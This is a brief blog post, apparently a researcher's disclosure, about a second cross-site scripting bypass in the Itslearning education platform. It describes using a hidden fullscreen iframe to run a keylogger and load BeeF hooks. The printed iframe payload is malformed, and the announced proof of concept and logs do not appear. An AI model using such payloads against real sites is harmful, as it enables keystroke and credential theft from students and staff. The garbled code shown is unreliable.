itslearning xss vulnerability

Today I want to explain you how I can still be able to execute javascript payloads on Itslearning education syste. Itslearning XSS part 2 begins!

You should check the part 1 of this article.


Mr. Håkon Høydal, wrote an article about Itslearning. After that Itslearning, did some things to filter javascript codes. But this is not enough I guess.

Itslearning XSS – iFrame is the key!

With the help of an iframe which is fullscreen and hidden, I can execute my keylogger payload.

Payload and PoC;

<iframe src=””position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;“>Your browser doesn’t support iframes</iframe>

PoC :

I can call my evil js by the way. So, I still can use BeeF XSS Framework.

Here is the logs.

The second XSS, I consider that not an harmful but I think Itslearning shouldn’t allow something like that.

I need say thanks to Ingvald Straume for helps in this process.